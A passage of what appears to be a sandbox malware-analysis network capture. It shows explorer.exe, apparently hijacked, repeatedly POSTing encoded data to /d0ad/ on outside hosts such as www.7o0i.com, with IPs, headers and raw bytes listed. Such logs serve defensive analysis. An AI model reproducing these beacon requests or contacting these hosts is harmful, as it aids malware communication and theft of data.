Oct 26, 2022 13:18:30.920986891 CEST	1335	OUT	Data Raw: 48 33 75 68 36 48 50 52 7a 52 78 50 70 59 6c 79 59 6b 39 65 55 75 42 42 55 46 6f 65 56 68 52 42 4f 51 63 30 32 55 38 41 35 72 6a 47 4b 54 5f 74 4d 51 71 75 72 49 43 45 47 6d 5f 38 66 5a 39 49 39 32 77 66 74 49 78 72 77 4f 31 55 32 51 78 43 57 49 Data Ascii: H3uh6HPRzRxPpYlyYk9eUuBBUFoeVhRBOQc02U8A5rjGKT_tMQqurICEGm_8fZ9I92wftIxrwO1U2QxCWILOCieW7Omq59VM9ApBxUQwOW_IRHxpFjBxl8egTnXNVdR3vISYLj2q06PTQQrqE~EgIMRT0yPtCAuoX~oFZXDyP8a3Jk-lker3_MjuyjF8CZCB-M-jBKCnrsO7nG0hLL-qAAhKvN_p4fyp4akVpwADNJ9GrvbZ61L
Oct 26, 2022 13:18:30.921178102 CEST	1336	OUT	Data Raw: 42 4a 30 39 5a 30 76 66 77 59 4a 74 4d 46 54 4e 6a 58 6d 28 73 4a 39 57 53 70 35 61 44 77 68 5a 6b 49 56 57 48 55 38 48 59 32 68 37 6d 52 46 44 63 75 4f 47 48 62 46 59 5f 55 7a 35 46 46 4a 54 37 68 4c 42 7a 5a 47 45 36 5a 62 52 72 49 41 68 43 44 Data Ascii: BJ09Z0vfwYJtMFTNjXm(sJ9WSp5aDwhZkIVWHU8HY2h7mRFDcuOGHbFY_Uz5FFJT7hLBzZGE6ZbRrIAhCDNElCYMXVknJxFqXmxsFE5H07K(45RRual9SOINDOXnmp1QKSI5eZy~a8mE_KlJ7UHm95i4qgjh0n0PfOVnsidp8eNcGX7dtWAQtLB5euRy14i8WzezxmYn9zbe_(hOt0LxgzN~_qyOk(xlw3pdYFusqDBn2XCScU7
Oct 26, 2022 13:18:30.921346903 CEST	1338	OUT	Data Raw: 39 4d 49 6f 70 32 6d 77 54 6d 77 52 4a 67 36 64 42 45 78 51 77 76 6f 72 57 75 5a 48 78 59 75 51 67 61 44 5a 75 43 76 46 42 55 4b 77 6d 7e 30 50 51 63 54 7a 32 61 4c 35 36 4f 4e 56 75 6a 36 4f 76 50 38 65 7a 7a 48 70 4c 6a 30 61 77 72 39 59 36 75 Data Ascii: 9MIop2mwTmwRJg6dBExQwvorWuZHxYuQgaDZuCvFBUKwm~0PQcTz2aL56ONVuj6OvP8ezzHpLj0awr9Y6uenoNxNd9dgHM9O4AxqETZzFezo20D6j69BMdsKYmNq-4pMp7jETJDn7HU9-(h~IzECQgbCugsCdetumAt3ph51oMZ5V~7GxEiYnfiJFUF0m(j~4e3KtlaRx2zyvwCMqiMuHCQRAGQzboeWizJjHFdK3zvz2sUUhDx
Oct 26, 2022 13:18:30.921689987 CEST	1340	OUT	Data Raw: 71 76 39 35 56 68 32 74 5f 48 41 79 4a 73 74 6e 2d 6b 76 43 35 5a 41 67 4f 34 31 36 6b 35 66 6f 64 52 65 7a 52 50 39 55 4e 6e 52 46 43 35 4a 72 75 55 65 5a 59 44 58 78 4d 64 67 6c 69 44 50 5a 59 6e 48 7a 4d 37 78 70 46 52 62 50 41 32 51 54 70 57 Data Ascii: qv95Vh2t_HAyJstn-kvC5ZAgO416k5fodRezRP9UNnRFC5JruUeZYDXxMdgliDPZYnHzM7xpFRbPA2QTpWNA7un5FyQGvMFq8vNw_PJQhtSTDXRnU9VtiH-ld20NWm8S051tVLvjWzLxHXscPHHsqiP9GvxHOdKmDknjQ6BKKoI2aiFHIfFCBJlZ50boZn8LnaXJ3yKnuHAqJcD6ehldN8F(O(6e3o-FbT95eTZ~MVsRx8IGzVG
Oct 26, 2022 13:18:30.922048092 CEST	1343	OUT	Data Raw: 4a 70 41 54 69 4e 68 4b 73 4e 33 65 76 79 44 5a 48 4c 4f 32 52 6b 43 4a 79 7e 67 39 77 74 31 38 46 6e 4c 7a 52 52 45 4e 58 38 43 39 57 73 4c 73 70 46 71 52 59 68 4d 7e 39 69 36 35 36 58 67 6b 58 74 30 6f 77 74 4a 77 30 61 69 36 35 52 67 68 6e 54 Data Ascii: JpATiNhKsN3evyDZHLO2RkCJy~g9wt18FnLzRRENX8C9WsLspFqRYhM~9i656XgkXt0owtJw0ai65RghnTmJR603w73vOdPGZGqe_CkOhPrqF9nAzySXM84cZRiwyoAGtX05lgQwhRZdJqWDch-xHPGOIFQA9xe8vTQhE(jZX5QLX~_w6B5DDdZtEJLcq83iyOQsVw6oIU7PK4QCO1t9qg1qxzUHs~OMAHJSj3SOns6YR9wExSB
Oct 26, 2022 13:18:30.922521114 CEST	1345	OUT	Data Raw: 45 43 47 54 6d 43 6e 6c 2d 66 6f 49 4e 6e 6d 49 73 77 65 68 6f 34 79 57 6d 66 4d 5a 64 34 4c 4b 6a 69 52 48 56 72 54 55 4f 45 56 39 65 4f 5f 41 73 7a 52 71 65 4c 41 45 55 44 63 6a 33 44 6f 6e 5f 28 47 6e 6c 55 79 71 4e 39 44 57 66 61 36 45 38 47 Data Ascii: ECGTmCnl-foINnmIsweho4yWmfMZd4LKjiRHVrTUOEV9eO_AszRqeLAEUDcj3Don_(GnlUyqN9DWfa6E8G71lmjXRFF9UTt9n0EhFKYllkA9lQwOqnz4yJb4B(OHRX9HjYotH(JEtP1ojQ6IuyQc1HkIh2sXdmD3WU3u1m84MACgvK5QJasGM2_6RPZ5VDRF4ZChOQu3OgLKPfx4bweBQsfg2FxOpD2gDrS7HDvdLfiPcWWYx(J
Oct 26, 2022 13:18:30.922663927 CEST	1347	OUT	Data Raw: 33 67 69 63 65 44 69 64 50 50 33 75 76 54 56 35 30 39 41 52 61 76 6f 35 56 51 4d 61 78 38 31 77 5f 6d 33 75 71 35 56 65 49 30 45 6d 6a 45 30 66 57 28 64 32 35 48 61 48 53 39 2d 51 63 38 6b 4f 58 32 30 79 30 38 48 6c 63 68 46 4e 62 52 6c 68 74 70 Data Ascii: 3giceDidPP3uvTV509ARavo5VQMax81w_m3uq5VeI0EmjE0fW(d25HaHS9-Qc8kOX20y08HlchFNbRlhtppRj(6ulL0L7I7lSSzSJK1WLxN2dlfnvR0rlDbWBh7l6X6tziHM47SnnC1ND~8SOVl(iph6UY-9ZMkHLY9Ssl1Z7RgFLl1ihnpiXGPWS9Aqw(YDWl0jsbE~aRyNcA2cKaEOTfIE4IUQv3mPcl3ssneFhfmzt2hNW3g
Oct 26, 2022 13:18:31.593769073 CEST	1371	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:18:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 6f 6e 67 6c 69 6e 77 61 6e 67 6c 75 6f 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.donglinwangluo.site Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.11.20	49901	154.221.20.121	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:32.945220947 CEST	1372	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=HCnz+iAgXK+7K7+9dSYLCP83SywxThg19T0Ldayx2vBhnzv8BQwSj7Hjke2daycRt4H7k7Lpl/EZig9RgqQ7Vyy58aT11h8vxw== HTTP/1.1 Host: www.donglinwangluo.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:18:33.279133081 CEST	1372	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:18:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 6f 6e 67 6c 69 6e 77 61 6e 67 6c 75 6f 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.donglinwangluo.site Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.11.20	49902	64.64.242.59	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:38.949594021 CEST	1373	OUT	POST /d0ad/ HTTP/1.1 Host: www.7o0i.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.7o0i.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.7o0i.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 5a 45 37 30 28 42 49 39 74 43 75 63 6d 43 68 6c 4f 33 62 44 31 33 5a 72 43 38 51 76 64 4d 42 6c 73 50 72 70 51 45 79 6f 6c 37 6b 4b 51 39 42 53 4a 53 49 2d 59 74 65 56 67 33 58 67 54 69 72 65 6e 67 4d 7a 66 72 77 45 57 66 31 5a 6a 4b 54 64 73 4d 75 79 66 33 73 39 7a 45 73 5a 59 53 43 30 6b 75 4b 6d 59 49 47 64 61 4c 42 69 79 48 6b 6f 53 6d 33 78 35 43 67 62 52 78 55 62 55 4b 50 44 4f 6f 6f 34 6e 69 67 75 59 35 62 38 50 6e 7a 54 54 65 36 74 42 76 74 35 4a 76 75 4a 33 4c 48 51 49 43 55 37 7e 59 59 73 33 57 6e 37 33 72 6d 58 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=ZE70(BI9tCucmChlO3bD13ZrC8QvdMBlsPrpQEyol7kKQ9BSJSI-YteVg3XgTirengMzfrwEWf1ZjKTdsMuyf3s9zEsZYSC0kuKmYIGdaLBiyHkoSm3x5CgbRxUbUKPDOoo4niguY5b8PnzTTe6tBvt5JvuJ3LHQICU7~YYs3Wn73rmXiA).
Oct 26, 2022 13:18:39.097276926 CEST	1374	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:18:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.11.20	49903	64.64.242.59	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:41.114376068 CEST	1375	OUT	POST /d0ad/ HTTP/1.1 Host: www.7o0i.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.7o0i.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.7o0i.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 5a 45 37 30 28 42 49 39 74 43 75 63 6b 69 52 6c 50 55 7a 44 79 58 5a 6b 4f 63 51 76 58 73 42 68 73 50 58 70 51 47 66 74 6c 4a 41 4b 52 63 78 53 49 57 55 2d 66 74 65 56 76 58 58 6c 51 53 72 42 6e 67 42 4f 66 71 38 45 57 5a 5a 5a 6a 39 54 64 39 63 75 39 4c 48 73 2d 6c 30 73 59 63 53 43 2d 6b 75 4f 41 59 4a 53 64 61 37 6c 69 31 46 4d 6f 42 6b 50 75 7e 69 67 52 54 78 55 59 66 71 50 52 4f 6f 6b 65 6e 6d 6c 5a 59 4b 48 38 50 47 54 54 53 65 36 75 4a 66 74 2d 55 66 76 70 7a 76 65 33 41 68 55 46 7e 36 4d 7a 30 55 61 57 79 4b 37 2d 35 4b 31 79 76 63 4e 51 77 6d 59 5f 70 39 28 55 36 7a 58 4c 7e 36 71 76 35 66 4a 34 75 6b 41 33 6d 55 4b 4c 67 69 4c 55 65 6b 70 38 30 4d 38 4e 42 46 33 39 6b 6d 67 6a 52 61 35 58 36 31 34 6d 6a 5a 61 4b 57 4f 68 4c 69 51 62 38 4a 66 53 67 31 39 42 41 5a 65 75 5f 70 78 55 4c 54 72 66 52 6b 2d 41 34 50 32 56 77 64 43 31 47 5a 6b 7a 4f 65 4f 65 4f 34 37 4b 45 5a 74 76 79 59 33 61 45 51 77 7a 46 7a 49 39 69 6d 7a 38 69 5a 6f 6d 67 67 34 54 5a 52 47 31 4f 70 74 47 79 62 35 47 6b 4e 6a 6e 53 61 62 58 62 55 41 62 74 4d 39 69 6e 32 41 5a 51 44 44 4b 49 34 5f 6b 69 47 64 43 2d 51 59 7a 62 66 77 58 74 4a 6c 62 47 7e 38 79 48 48 31 30 49 66 62 53 33 70 70 35 5f 73 6f 53 31 67 51 56 35 62 4c 38 43 35 33 57 39 34 47 35 75 30 75 4c 39 5a 41 65 31 38 56 76 65 44 4e 51 5f 51 77 77 57 56 5a 78 63 49 66 38 58 68 6b 68 4d 35 4e 66 4d 54 6d 6a 35 71 5a 75 39 38 73 53 66 61 34 76 46 39 61 67 44 42 6c 48 47 67 4c 47 64 4a 34 58 67 43 4a 76 50 50 4a 30 4e 34 50 31 57 67 51 66 4b 76 50 69 5a 6e 44 30 78 72 6a 59 65 42 68 54 55 58 6d 34 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=ZE70(BI9tCuckiRlPUzDyXZkOcQvXsBhsPXpQGftlJAKRcxSIWU-fteVvXXlQSrBngBOfq8EWZZZj9Td9cu9LHs-l0sYcSC-kuOAYJSda7li1FMoBkPu~igRTxUYfqPROokenmlZYKH8PGTTSe6uJft-Ufvpzve3AhUF~6Mz0UaWyK7-5K1yvcNQwmY_p9(U6zXL~6qv5fJ4ukA3mUKLgiLUekp80M8NBF39kmgjRa5X614mjZaKWOhLiQb8JfSg19BAZeu_pxULTrfRk-A4P2VwdC1GZkzOeOeO47KEZtvyY3aEQwzFzI9imz8iZomgg4TZRG1OptGyb5GkNjnSabXbUAbtM9in2AZQDDKI4_kiGdC-QYzbfwXtJlbG~8yHH10IfbS3pp5_soS1gQV5bL8C53W94G5u0uL9ZAe18VveDNQ_QwwWVZxcIf8XhkhM5NfMTmj5qZu98sSfa4vF9agDBlHGgLGdJ4XgCJvPPJ0N4P1WgQfKvPiZnD0xrjYeBhTUXm4.
Oct 26, 2022 13:18:41.260904074 CEST	1375	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:18:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49850	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:15:50.154114008 CEST	388	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 51 4b 72 79 4d 75 59 67 62 72 62 4f 73 44 6e 38 30 33 77 4a 44 73 33 61 75 64 4d 50 68 39 75 57 36 62 42 45 7e 7a 51 5a 37 43 45 50 46 4a 76 69 75 62 37 55 7a 56 52 36 53 4d 57 71 75 51 74 4c 4d 66 32 54 61 72 28 57 42 53 4e 52 51 4b 56 62 64 43 71 70 76 41 42 71 6e 48 61 5a 4e 53 75 38 65 6c 67 4d 43 6d 4c 34 69 43 44 37 4a 73 79 73 70 66 41 6e 33 54 36 42 66 52 31 43 64 5a 32 79 34 46 69 64 76 6c 48 6e 62 30 6d 53 56 2d 43 6a 66 56 32 6d 6c 4e 5a 41 36 41 30 2d 73 63 5a 6d 4f 68 66 66 38 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=1_AFw1b3p2LiQKryMuYgbrbOsDn803wJDs3audMPh9uW6bBE~zQZ7CEPFJviub7UzVR6SMWquQtLMf2Tar(WBSNRQKVbdCqpvABqnHaZNSu8elgMCmL4iCD7JsyspfAn3T6BfR1CdZ2y4FidvlHnb0mSV-CjfV2mlNZA6A0-scZmOhff8A).
Oct 26, 2022 13:15:50.350687981 CEST	388	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:15:50 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.11.20	49904	64.64.242.59	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:43.285996914 CEST	1385	OUT	POST /d0ad/ HTTP/1.1 Host: www.7o0i.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.7o0i.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.7o0i.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 5a 45 37 30 28 42 49 39 74 43 75 63 6b 69 52 6c 50 55 7a 44 79 58 5a 6b 4f 63 51 76 58 73 42 68 73 50 58 70 51 47 66 74 6c 4a 49 4b 51 75 70 53 4a 33 55 2d 65 74 65 56 69 33 58 6b 51 53 72 49 6e 68 6f 4a 66 71 41 2d 57 63 46 5a 69 75 62 64 39 75 47 39 62 33 73 5f 71 55 73 61 59 53 43 71 6b 75 4b 55 59 4a 47 4e 61 50 6c 69 79 43 49 6f 57 7a 6a 78 69 69 67 62 54 78 55 45 62 71 4f 6d 4f 6f 77 4f 6e 6d 68 5a 59 49 7a 38 4d 56 37 54 51 4a 4f 75 41 76 74 39 65 5f 76 6d 36 50 65 47 41 68 41 72 7e 36 4d 4a 30 56 65 57 79 4b 62 2d 34 4c 31 39 71 4d 4e 51 73 32 59 38 6a 64 6a 51 36 7a 37 70 7e 36 65 76 35 66 68 34 75 45 41 33 74 51 65 45 70 69 4c 6f 4a 45 70 72 77 4d 34 46 42 47 4b 47 6b 69 77 6a 51 71 46 58 38 45 34 6d 6b 37 69 4b 65 4f 68 56 28 67 62 6a 43 5f 53 43 31 38 78 6d 5a 66 4f 4a 70 32 73 4c 54 4c 28 52 79 36 55 35 48 32 56 32 42 53 31 54 64 6b 76 53 65 4f 4f 6f 34 37 4b 55 5a 76 44 79 59 48 71 45 54 78 7a 47 77 59 39 70 39 44 38 33 58 49 36 75 67 38 4c 72 52 47 74 6e 70 73 53 79 59 5a 47 6b 59 77 4f 45 44 37 58 69 66 67 62 5f 54 74 69 77 32 42 6b 73 44 47 72 5f 34 50 49 69 48 74 53 2d 48 59 7a 59 4f 67 58 68 41 46 62 41 70 4d 79 48 48 31 35 35 66 62 65 33 6f 61 6c 5f 74 65 69 31 6c 48 35 35 58 72 38 45 35 33 57 57 34 47 39 4e 30 75 43 71 5a 42 75 66 38 54 50 65 45 5a 55 5f 56 30 6b 5a 52 70 78 5a 65 76 38 41 6c 6b 39 6c 35 4e 44 55 54 6d 79 4d 71 4f 7e 39 39 73 43 66 58 59 76 45 76 4b 67 45 43 6c 47 50 32 37 61 42 4a 34 4b 62 43 49 62 68 50 4c 6b 4e 6f 66 78 4e 37 7a 37 4a 31 66 71 56 72 32 45 63 6a 42 49 4f 54 41 4c 69 42 77 43 6b 54 53 28 52 6c 30 66 4f 70 67 5a 31 5a 4e 41 66 6a 74 54 32 39 36 59 35 6b 4b 67 43 74 51 7e 69 6b 36 79 47 79 51 64 52 74 36 7e 73 54 4a 5a 74 43 48 63 35 4f 6a 47 6b 33 70 67 55 45 35 6a 79 71 72 43 70 6f 52 49 6d 51 67 32 72 4a 69 6e 51 51 50 64 38 72 65 4f 79 31 39 48 7a 78 74 6b 50 53 34 74 51 64 54 6f 5a 42 5a 4f 73 79 45 57 65 4a 5a 72 45 28 32 51 41 42 2d 68 56 37 38 68 59 75 6f 59 46 77 69 28 6a 4d 43 67 69 51 38 54 54 51 31 32 58 76 49 70 6a 61 2d 6a 73 62 71 73 57 6e 6d 65 43 42 39 72 74 66 55 42 79 75 4b 5a 32 78 62 47 62 42 77 37 4f 33 7a 4e 6f 71 67 42 62 76 70 5a 6e 4a 78 4b 51 6c 71 30 54 64 69 71 38 4f 34 73 70 57 35 42 77 44 69 44 6f 49 6b 55 46 7e 62 41 6a 4a 30 34 44 74 75 38 4b 31 6a 41 42 50 4f 41 6e 4a 63 4a 74 77 2d 70 45 4d 61 34 69 47 79 61 69 6b 4a 68 6f 35 58 38 42 70 4b 4e 6a 77 71 7a 70 51 52 6c 61 32 34 31 31 46 71 46 31 68 43 33 55 38 4d 4d 49 54 5a 63 32 7a 34 79 79 30 58 4d 64 4f 51 38 37 49 31 4c 55 53 69 49 6e 28 32 74 74 77 73 75 73 4d 5a 37 67 54 4b 4e 6f 6e 66 31 49 72 4a 64 4d 30 52 63 75 31 30 72 51 34 5f 31 79 73 41 38 43 37 76 33 71 48 64 37 62 36 70 36 55 31 72 4a 6c 67 35 6e 43 48 6d 78 2d 74 6e 62 65 28 75 5a 76 78 61 4d 45 57 4f 51 4e 4d 64 52 33 78 2d 7a 50 54 79 6d 69 7e 66 42 31 45 37 33 5f 53 30 48 6f 71 49 6f 54 54 42 71 67 75 4f 6e 30 73 71 5a 56 77 30 49 76 7e 4a 68 73 65 4b 74 69 51 59 71 74 67 36 4c 46 77 6a 44 34 59 59 36 75 6d 38 62 38 75 6b 4c 41 45 4b 78 4b 6f 4b 59 4d 34 35 54 76 32 6f 54 77 6b 50 41 59 69 77 75 4a 32 62 35 4d 48 36 67 66 32 77 4f 46 32 33 58 6f 46 59 4e 4e 72 34 71 6b 28 72 75 68 61 45 4b 70 34 45 48 75 37 56 51 30 35 78 4d 38 66 6c 6f 63 47 51 46 64 59 54 49 4f 59 50 44 65 45 7a 28 66 57 55 72 5a 35 48 28 73 4b 69 4e 6e 42 30 6a 46 39 5f 47 4c 7e 65 6e 39 55 67 4e 50 75 46 6e 6e 6b 73 4e 37 32 47 66 56 52 48 4f 4a 38 6a 68 36 76 46 66 34 6b 76 68 6f 78 41 32 62 64 5a 73 4a 33 64 6a 35 55 73 78 74 62 33 71 36 33 6f 35 42 63 5f 37 75 5a 6e 4c 65 72 76 56 43 48 5f 75 67 67 5a 6c 32 69 31 56 36 36 61 53 67 53 58 58 47 4c 45 30 52 44 51 4b 59 68 5f 4f 59 42 7a 49 41 55 51 51 39 47 5f 4e 44 33 33 64 49 79 6b 6f 61 28 4b 65 44 59 44 41 33 7e 54 56 39 73 71 6b 2d 39 55 6a 64 56 31 56 77 70 43 51 64 39 47 57 4f 45 30 72 6d 5a 59 68 66 48 45 51 71 72 4e 6a 57 4f 57 4d 56 69 70 5a 62 68 45 41 65 57 31 6c 42 51 4a 36 34 47 42 36 44 6c 61 6d 48 78 72 33 70 7a 6d 4d 5f 55 5f 6e 4d 7a 35 33 50 31 48 56 52 43 75 6a 66 39 6c 4f 47 7a 69 74 67 70 46 75 78 50 38 42 63 50 30 62 45 51 37 4f 67 78 62 6c 39 39 59 47 Data Ascii: 